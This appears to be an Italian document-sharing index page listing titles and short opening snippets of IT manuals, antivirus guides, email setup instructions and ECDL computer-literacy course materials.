Introduzione ai certificati S/MIME e alla posta elettronica certificata...2 Procedura di installazione del certificato personale S/MIME rilasciato

Introduzione ai certificati S/MIME e alla posta elettronica certificata...2 Procedura di installazione del certificato personale S/MIME rilasciato Guida all installazione e all utilizzo di un certificato personale S/MIME (GPSE) Introduzione ai certificati S/MIME e alla posta elettronica certificata...2 Procedura di installazione del certificato personale

Dettagli

Le principali novità di Word XP

Le principali novità di Word XP Le principali novità di Word XP di Gemma Francone supporto tecnico di Mario Rinina Il programma può essere aperto in diversi modi, per esempio con l uso dei pulsanti di seguito riportati. In alternativa

Dettagli

Installazione di GFI FAXmaker

Installazione di GFI FAXmaker Installazione di GFI FAXmaker Requisiti di sistema Prima di installare GFI FAXmaker, assicurarsi di soddisfare tutti i requisiti che seguono. Server FAX GFI FAXmaker: Una macchina server Windows 2000 o

Dettagli

Uso di Avast Free 8.01

Uso di Avast Free 8.01 Uso di Avast Free 8.01 Rispetto alla precedente versione, Avast Free 8.01, creato da Avast Software, ha introdotto rilevanti modifiche nell interfaccia utente, mantenendo comunque inalterata la sua ottima

Dettagli

Corso di Alfabetizzazione Informatica

Corso di Alfabetizzazione Informatica Corso di Alfabetizzazione Informatica Scopo di questo corso, vuole essere quello di fornire ad ognuno dei partecipanti, indipendentemente dalle loro precedenti conoscenze informatiche, l apprendimento

Dettagli

EUROPEAN COMPUTER DRIVING LICENCE SYLLABUS VERSIONE 5.0

EUROPEAN COMPUTER DRIVING LICENCE SYLLABUS VERSIONE 5.0 Pagina I EUROPEAN COMPUTER DRIVING LICENCE SYLLABUS VERSIONE 5.0 Modulo 7 Navigazione web e comunicazione Il seguente Syllabus è relativo 7, Navigazione web e comunicazione, e fornisce i fondamenti per

Dettagli

Sophos Computer Security Scan Guida di avvio

Sophos Computer Security Scan Guida di avvio Sophos Computer Security Scan Guida di avvio Versione prodotto: 1.0 Data documento: febbraio 2010 Sommario 1 Software...3 2 Cosa fare...3 3 Preparazione per la scansione...3 4 Installazione del software...4

Dettagli

Avviare il computer e collegarsi in modo sicuro utilizzando un nome utente e una password.

Avviare il computer e collegarsi in modo sicuro utilizzando un nome utente e una password. Uso del computer e gestione dei file Primi passi col computer Avviare il computer e collegarsi in modo sicuro utilizzando un nome utente e una password. Spegnere il computer impiegando la procedura corretta.

Dettagli

FileMaker Server 11. Guida all'aggiornamento dei plug-in

FileMaker Server 11. Guida all'aggiornamento dei plug-in FileMaker Server 11 Guida all'aggiornamento dei plug-in 2010 FileMaker, Inc. Tutti i diritti riservati. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker è un marchio di

Dettagli

Modulo 7 Navigazione web e comunicazione

Modulo 7 Navigazione web e comunicazione Modulo 7 Navigazione web e comunicazione Il seguente Syllabus è relativo al Modulo 7, Navigazione web e comunicazione, e fornisce i fondamenti per il test di tipo teorico e pratico relativo a questo modulo.

Dettagli

Posta Elettronica con Microsoft Outlook Express II

Posta Elettronica con Microsoft Outlook Express II Posta Elettronica con Microsoft Outlook Express - II Posta Elettronica con Microsoft Outlook Express II 1. Avvio di MS Outlook Express 2. Ricezione di messaggi di posta 3. Invio di messaggi di posta 4.

Dettagli

Istruzioni Aggiornamento RGT Xml

Istruzioni Aggiornamento RGT Xml Istruzioni Aggiornamento RGT Xml Sommario Installazione dell'aggiornamento... 2 Download...2 Installazione...2 Modulo RGT - Utilizzo e Funzioni... 7 Dati Generali...9 Testatore...10 Atto...12 Atto Di Riferimento...13

Dettagli

Modulo 7 Navigazione web e comunicazione (Syllabus 5.0 Internet Explorer e Outlook Express)

Modulo 7 Navigazione web e comunicazione (Syllabus 5.0 Internet Explorer e Outlook Express) Modulo 7 Navigazione web e comunicazione (Syllabus 5.0 Internet Explorer e Outlook Express) Ricordarsi di utilizzare, dove possibile, i diversi tipi di tecniche per svolgere i compiti richiesti: 1. comandi

Dettagli

Acer edatasecurity Management

Acer edatasecurity Management 1 Acer edatasecurity Management Applicando le tecnologie di crittografia più avanzate, Acer edatasecurity Management offre agli utenti Acer PC una maggiore protezione dei dati personali e la possibilità

Dettagli

Corso di Introduzione all Informatica (corso A) MS-WINDOWS. Esercitatore: Francesco Folino

Corso di Introduzione all Informatica (corso A) MS-WINDOWS. Esercitatore: Francesco Folino Corso di Introduzione all Informatica (corso A) MS-WINDOWS Esercitatore: Francesco Folino IL SISTEMA OPERATIVO Il Sistema Operativo è il software che permette l interazione tra uomo e macchina (hardware).

Dettagli

Sage Start Archivio file Guida. Dalla versione 2015 09.10.2014

Sage Start Archivio file Guida. Dalla versione 2015 09.10.2014 Sage Start Archivio file Guida Dalla versione 2015 09.10.2014 Sommario 1.0 Introduzione 3 1.1 Moduli con archivio file 3 1.2 Informazioni generali 3 1.2.1 Cancellazione di record di dati 4 1.2.2 Duplicazione

Dettagli

Colloquio di informatica (5 crediti)

Colloquio di informatica (5 crediti) Università degli studi della Tuscia Dipartimento di Scienze Ecologiche e Biologiche Corso di laurea in Scienze Ambientali A.A. 2013-2014 - II semestre Colloquio di informatica (5 crediti) Prof. Pier Giorgio

Dettagli

Dieci regole per la sicurezza 1. Tenere separati il sistema operativo ed i programmi rispetto ai dati (documenti, foto, filmati, musica ): installare

Dieci regole per la sicurezza 1. Tenere separati il sistema operativo ed i programmi rispetto ai dati (documenti, foto, filmati, musica ): installare Dieci regole per la sicurezza 1. Tenere separati il sistema operativo ed i programmi rispetto ai dati (documenti, foto, filmati, musica ): installare Windows 7 e i software applicativi sul disco fisso

Dettagli

2 Dipendenza da Internet 6 2.1 Tipi di dipendenza... 6 2.2 Fasi di approccio al Web... 6 2.3 Fine del corso... 7

2 Dipendenza da Internet 6 2.1 Tipi di dipendenza... 6 2.2 Fasi di approccio al Web... 6 2.3 Fine del corso... 7 Sommario Indice 1 Sicurezza informatica 1 1.1 Cause di perdite di dati....................... 1 1.2 Protezione dei dati.......................... 2 1.3 Tipi di sicurezza........................... 3 1.4

Dettagli

Concetti di base sul Software dei computer. Unitre Anno 2014-2015

Concetti di base sul Software dei computer. Unitre Anno 2014-2015 Concetti di base sul Software dei computer Unitre Anno 2014-2015 Software Un software è sempre un programma scritto in un linguaggio di programmazione ad alto livello che contiene una lista di istruzioni.

Dettagli

Istruzioni Installazione, Registrazione e Configurazione di PEC Mailer

Istruzioni Installazione, Registrazione e Configurazione di PEC Mailer Istruzioni Installazione, Registrazione e Configurazione di PEC Mailer Elenco delle Istruzioni: 1- Download del Software PEC Mailer 2- Installazione del Software PEC Mailer 3- Registrazione del Software

Dettagli

Uso di Avast Free 7.01

Uso di Avast Free 7.01 Uso di Avast Free 7.01 Abbastanza simile alla precedente versione e ovviamente sempre in lingua italiana, Avast Free 7.01 creato da Avast Software, ha un ottima fama fra le soluzioni anti-malware gratuite:

Dettagli

2. Salvare il file (cartella di lavoro) con il nome Tabelline 3. Creare le seguenti due tabelle (una tabellina non compilata e una compilata)

2. Salvare il file (cartella di lavoro) con il nome Tabelline 3. Creare le seguenti due tabelle (una tabellina non compilata e una compilata) Tabellina Pitagorica Per costruire il foglio elettronico per la simulazione delle tabelline occorre: 1. Aprire Microsoft Excel 2. Salvare il file (cartella di lavoro) con il nome Tabelline 3. Creare le

Dettagli

INFORMATION TECNOLOGY. a cura di Alessandro Padovani padoale@libero.it

INFORMATION TECNOLOGY. a cura di Alessandro Padovani padoale@libero.it INFORMATION TECNOLOGY 3 a cura di Alessandro Padovani padoale@libero.it 1 SICUREZZA DELLE INFORMAZIONI Le politiche di sicurezza dei dati informatici (che sono spesso il maggior patrimonio di un azienda)

Dettagli

CORSO RETI I FORMATICHE E POSTA ELETTRO ICA

CORSO RETI I FORMATICHE E POSTA ELETTRO ICA CORSO RETI I FORMATICHE E POSTA ELETTRO ICA Programma basato su quello necessario per superare il corrispondente esame per la patente europea (modulo 7) Internet Concetti e termini Capire cosa è Internet

Dettagli

AMD Athlon64, Opteron o Intel EM64T Pentium 4 / Pentium 4 processore Xeon Spazio libero su hard disk: 50MB 50MB

AMD Athlon64, Opteron o Intel EM64T Pentium 4 / Pentium 4 processore Xeon Spazio libero su hard disk: 50MB 50MB 1 AVAST! 4 HOME EDITION 1.1 SPECIFICHE DEL PRODOTTO Avast! è un AntiVirus, un programma creato con lo scopo di rilevare ed eliminare virus informatici. I virus sono programmi che appartengono alla categoria

Dettagli

Microsoft Excel Lezione 2

Microsoft Excel Lezione 2 Corso di Introduzione all Informatica Microsoft Excel Lezione 2 Esercitatore: Fabio Palopoli Formattazione del foglio di lavoro Cella [1/4 1/4] Formati numerici: menu Formato/Celle, scheda Numero Pulsante

Dettagli

Anno 2009/2010 Syllabus 5.0

Anno 2009/2010 Syllabus 5.0 Patente Europea di Informatica ECDL Modulo 2 Lezione 3: Pannello di controllo Caratteristiche del sistema Gestione delle stampe Utilità Anno 2009/2010 Syllabus 5.0 Il Pannello di Controllo permette di

Dettagli

test di tipo teorico e pratico relativo a questo modulo.

test di tipo teorico e pratico relativo a questo modulo. 0RGXOR±1DYLJD]LRQHZHEHFRPXQLFD]LRQH Il seguente Syllabus è relativo al Modulo 7, 1DYLJD]LRQHZHEHFRPXQLFD]LRQH, e fornisce i fondamenti per il test di tipo teorico e pratico relativo a questo modulo. 6FRSLGHOPRGXOR

Dettagli

F.a.Q. INSTALLAZIONE - 1 -

F.a.Q. INSTALLAZIONE - 1 - INSTALLAZIONE D) Devo presentare una pratica allo Sportello Unico di dove posso scaricare il software richiesto per la presentazione della stessa? R) Andare sul sito istituzionale dello Sportello Unico

Dettagli

Scansione. Stampante/copiatrice WorkCentre C2424

Scansione. Stampante/copiatrice WorkCentre C2424 Scansione In questo capitolo sono inclusi i seguenti argomenti: "Nozioni di base sulla scansione" a pagina 4-2 "Installazione del driver di scansione" a pagina 4-4 "Regolazione delle opzioni di scansione"

Dettagli

PREMESSA. Procedure di protezione che, ovviamente, dovranno essere riabilitate al termine dell'installazione.

PREMESSA. Procedure di protezione che, ovviamente, dovranno essere riabilitate al termine dell'installazione. PREMESSA E' buona e comune regola che, accingendosi a installare programmi che abbiano origine certa, si proceda preliminarmente alla disattivazione di Firewall e Antivirus. Procedure di protezione che,

Dettagli

Modulo 7 Navigazione web e comunicazione (Syllabus 5.0 Firefox e Thunderbird Windows e Linux)

Modulo 7 Navigazione web e comunicazione (Syllabus 5.0 Firefox e Thunderbird Windows e Linux) Modulo 7 Navigazione web e comunicazione (Syllabus 5.0 Firefox e Thunderbird Windows e Linux) I comandi dei due programmi sono quasi del tutto identici nelle due versioni (Windows e Linux). Le poche differenze,

Dettagli

1 CIRCOLO SPINEA (VE) CORSO CONOSCENZA E MANUTENZIONE DEL COMPUTER APRILE 2010 COME RIPULIRE IL PC UTILIZZANDO UN APPOSITO SOFTWARE

1 CIRCOLO SPINEA (VE) CORSO CONOSCENZA E MANUTENZIONE DEL COMPUTER APRILE 2010 COME RIPULIRE IL PC UTILIZZANDO UN APPOSITO SOFTWARE 1 CIRCOLO SPINEA (VE) CORSO CONOSCENZA E MANUTENZIONE DEL COMPUTER APRILE 2010 COME RIPULIRE IL PC UTILIZZANDO UN APPOSITO SOFTWARE In alternativa alle procedure che si seguono utilizzando le specifiche

Dettagli

Compilazione rapporto di Audit in remoto

Compilazione rapporto di Audit in remoto Compilazione rapporto di Audit in remoto Installazione e manuale utente CSI S.p.A. V.le Lombardia 20-20021 Bollate (MI) Tel. 02.383301 Fax 02.3503940 E-mail: info@csi-spa.com Rev. 1.1 23/07/09 Indice Indice...

Dettagli

Consiglio regionale della Toscana. Regole per il corretto funzionamento della posta elettronica

Consiglio regionale della Toscana. Regole per il corretto funzionamento della posta elettronica Consiglio regionale della Toscana Regole per il corretto funzionamento della posta elettronica A cura dell Ufficio Informatica Maggio 2006 Indice 1. Regole di utilizzo della posta elettronica... 3 2. Controllo

Dettagli

Istruzioni per l installazione del software per gli esami ICoNExam (Aggiornate al 15/01/2014)

Istruzioni per l installazione del software per gli esami ICoNExam (Aggiornate al 15/01/2014) Istruzioni per l installazione del software per gli esami ICoNExam (Aggiornate al 15/01/2014) Il software per gli esami ICON può essere eseguito su qualunque computer dotato di Java Virtual Machine aggiornata.

Dettagli

IFTS anno formativo 2012-2103 Tecnico superiore per il monitoraggio e la gestione del territorio e dell ambiente

IFTS anno formativo 2012-2103 Tecnico superiore per il monitoraggio e la gestione del territorio e dell ambiente IFTS anno formativo 2012-2103 Tecnico superiore per il monitoraggio e la gestione del territorio e dell ambiente PREPARAZIONE ECDL Modulo 2 : Usare il computer e gestire file Esperto: Salvatore Maggio

Dettagli

ESET NOD32 ANTIVIRUS 7

ESET NOD32 ANTIVIRUS 7 ESET NOD32 ANTIVIRUS 7 Microsoft Windows 8.1 / 8 / 7 / Vista / XP / Home Server 2003 / Home Server 2011 Guida di avvio rapido Fare clic qui per scaricare la versione più recente di questo documento ESET

Dettagli

bigini@cefriel.it http://www.cefriel.it/ns

bigini@cefriel.it http://www.cefriel.it/ns bigini@cefriel.it http://www.cefriel.it/ns Virus Macro Virus Worm Un programma in grado di riprodurre autonomamente il proprio codice, inserendolo in quello di un altro programma, in modo tale che questo

Dettagli

zonamatematica etutor EDITOR Guida all uso versione 4.1

zonamatematica etutor EDITOR Guida all uso versione 4.1 zonamatematica Il portale De Agostini Scuola dedicato all insegnamento e all apprendimento della matematica nella scuola secondaria etutor EDITOR Guida all uso versione 4.1 zonamatematica etutor EDITOR

Dettagli

Windows SteadyState?

Windows SteadyState? Domande tecniche frequenti relative a Windows SteadyState Domande di carattere generale È possibile installare Windows SteadyState su un computer a 64 bit? Windows SteadyState è stato progettato per funzionare

Dettagli

Introduzione all'uso di

Introduzione all'uso di Introduzione all'uso di Microsoft Outlook Express 6 Outlook Express 6 è un programma, incluso nel browser di Microsoft Internet Explorer, che ci permette di inviare e ricevere messaggi di posta elettronica.

Dettagli

Il computer: primi elementi

Il computer: primi elementi Il computer: primi elementi Tommaso Motta T. Motta Il computer: primi elementi 1 Informazioni Computer = mezzo per memorizzare, elaborare, comunicare e trasmettere le informazioni Tutte le informazioni

Dettagli

Eusing Free Registry Cleaner Guida in lingua italiana

Eusing Free Registry Cleaner Guida in lingua italiana Eusing Free Registry Cleaner Guida in lingua italiana 1 Corrispondenze inglese/italiano dei termini del pannello Sommario/Indice Sommario Overview = Panoramica Interface = Interfaccia What can Eusing Free

Dettagli

Il Malware (1) malware software computer malicious software malware

Il Malware (1) malware software computer malicious software malware I virus informatici Il Malware (1) Si definisce malware un qualsiasi software creato con il solo scopo di creare danni più o meno estesi al computer su cui viene eseguito. Il termine deriva dalla contrazione

Dettagli

Installazione di GFI WebMonitor

Installazione di GFI WebMonitor Installazione di GFI WebMonitor Requisiti di sistema di GFI WebMonitor Server Microsoft Windows 2000 (SP 3) o 2003. Microsoft ISA 2000 Server (non in modalità solo firewall) OPPURE Server Microsoft ISA

Dettagli

Prova di informatica & Laboratorio di Informatica di Base

Prova di informatica & Laboratorio di Informatica di Base Prova di informatica & Laboratorio di Informatica di Base Prof. Orlando De Pietro Programma L' hardware Computer multiutente e personal computer Architettura convenzionale di un calcolatore L unità centrale

Dettagli

Manuale per la compilazione dei Questionari di rilevazione Monitor440 Modalità On-line e Off-Line

Manuale per la compilazione dei Questionari di rilevazione Monitor440 Modalità On-line e Off-Line Manuale per la compilazione dei Questionari di rilevazione Monitor440 Modalità On-line e Off-Line INVALSI Istituto nazionale per la valutazione del sistema educativo di istruzione e di formazione Via Borromini,

Dettagli

Specifiche di installazione LibreOffice tramite policy di Active Directory

Specifiche di installazione LibreOffice tramite policy di Active Directory foto di Samuele Ghilardi Specifiche di installazione LibreOffice tramite policy di Active Directory curato da Andrea Castellani, Sonia Montegiove, Alfredo Parisi Il presente documento è finalizzato a fornire

Dettagli

Il Desktop. Gli elementi del Desktop. Icona Risorse del computer. Icona Cestino. Icona Risorse di rete. Lezione 3 piccolo manuale di Windows

Il Desktop. Gli elementi del Desktop. Icona Risorse del computer. Icona Cestino. Icona Risorse di rete. Lezione 3 piccolo manuale di Windows Ing. Irina Trubitsyna Ing. Ester Zumpano Università degli Studi della Calabria Anno Accademico 2003-2004 2004 Lezione 3 piccolo manuale di Windows Il Desktop Il desktop è ciò che viene visualizzato sullo

Dettagli

ESET NOD32 ANTIVIRUS 6

ESET NOD32 ANTIVIRUS 6 ESET NOD32 ANTIVIRUS 6 Microsoft Windows 8 / 7 / Vista / XP / Home Server Guida di avvio rapido Fare clic qui per scaricare la versione più recente di questo documento ESET NOD32 Antivirus offre una protezione

Dettagli

Cosa devo fare? Capitolo Pagina Prima della sostituzione. Ho caricato tutti i dati archiviati di Outlook (.pst) che sono necessari 3.

Cosa devo fare? Capitolo Pagina Prima della sostituzione. Ho caricato tutti i dati archiviati di Outlook (.pst) che sono necessari 3. GWP W7 User Guide 04.04.2013 Validità per il rollout con 20.06.2013 Modifiche per Client LifeCycle Lista di controllo Nome computer Data migrazione Eseguito da Data sostituzione HW Cosa devo fare? Capitolo

Dettagli

Sequenza di finestre per lavorare con i punti di ripristino. e.g.

Sequenza di finestre per lavorare con i punti di ripristino. e.g. Un punto di ripristino è come una Istantanea della configurazione del PC che il sistema operativo crea e salva con l intento di dare all utente la possibilità di recuperare la configurazione stessa nel

Dettagli

1 Configurazione del programma di Posta Elettronica MS Outlook Express

1 Configurazione del programma di Posta Elettronica MS Outlook Express 1 Configurazione del programma di Posta Elettronica MS Outlook Express In questo capitolo vengono descritte le operazioni per la configurazione dell account di posta su MS Outlook Express. 1.1 Configurazione

Dettagli

FAQ. 1. Installazione. Messaggio hardware features are not compatible with CadLite, installation aborted

FAQ. 1. Installazione. Messaggio hardware features are not compatible with CadLite, installation aborted FAQ 1. Installazione Messaggio hardware features are not compatible with CadLite, installation aborted 1. Le caratteristiche hw non rispondono ai requisiti minimi richiesti 1. Verificare i requisiti minimi

Dettagli

Antivirus Pro 2012. Guida introduttiva

Antivirus Pro 2012. Guida introduttiva Antivirus Pro 2012 Guida introduttiva Importante Sulla custodia del CD sarà possibile trovare il codice di attivazione con il quale attivare il prodotto. Si consiglia di conservarlo in un luogo sicuro.

Dettagli

> Gestione Invalidi Civili <

> Gestione Invalidi Civili < > Gestione Invalidi Civili < GUIDA RAPIDA ALL'UTILIZZO DEL PRODOTTO (rev. 1.3) INSTALLAZIONE, ATTIVAZIONE E CONFIGURAZIONE INIZIALE ESECUZIONE DEL SOFTWARE INSERIMENTO ANAGRAFICA RICERCA ANAGRAFICA INSERIMENTO

Dettagli

ESET CYBER SECURITY per Mac Guida all avvio rapido. Fare clic qui per scaricare la versione più recente di questo documento

ESET CYBER SECURITY per Mac Guida all avvio rapido. Fare clic qui per scaricare la versione più recente di questo documento ESET CYBER SECURITY per Mac Guida all avvio rapido Fare clic qui per scaricare la versione più recente di questo documento ESET Cyber Security fornisce una protezione del computer all'avanguardia contro

Dettagli

Gestione di file e uso delle applicazioni

Gestione di file e uso delle applicazioni Obiettivi del corso Gestione di file e uso delle applicazioni Conoscere gli elementi principali dell interfaccia di Windows Gestire file e cartelle Aprire salvare e chiudere un file Lavorare con le finestre

Dettagli

McAfee PC Protection Plus - Guida rapida

McAfee PC Protection Plus - Guida rapida Protezione del computer e dei file più importanti McAfee PC Protection Plus blocca virus, spyware e hacker ed esegue anche il backup e il ripristino di video, musica e file importanti. Include anche strumenti

Dettagli

MODULO 5 Basi di dati (database)

MODULO 5 Basi di dati (database) MODULO 5 Basi di dati (database) I contenuti del modulo: questo modulo riguarda la conoscenza da parte del candidato dei concetti fondamentali sulle basi di dati e la sua capacità di utilizzarli. Il modulo

Dettagli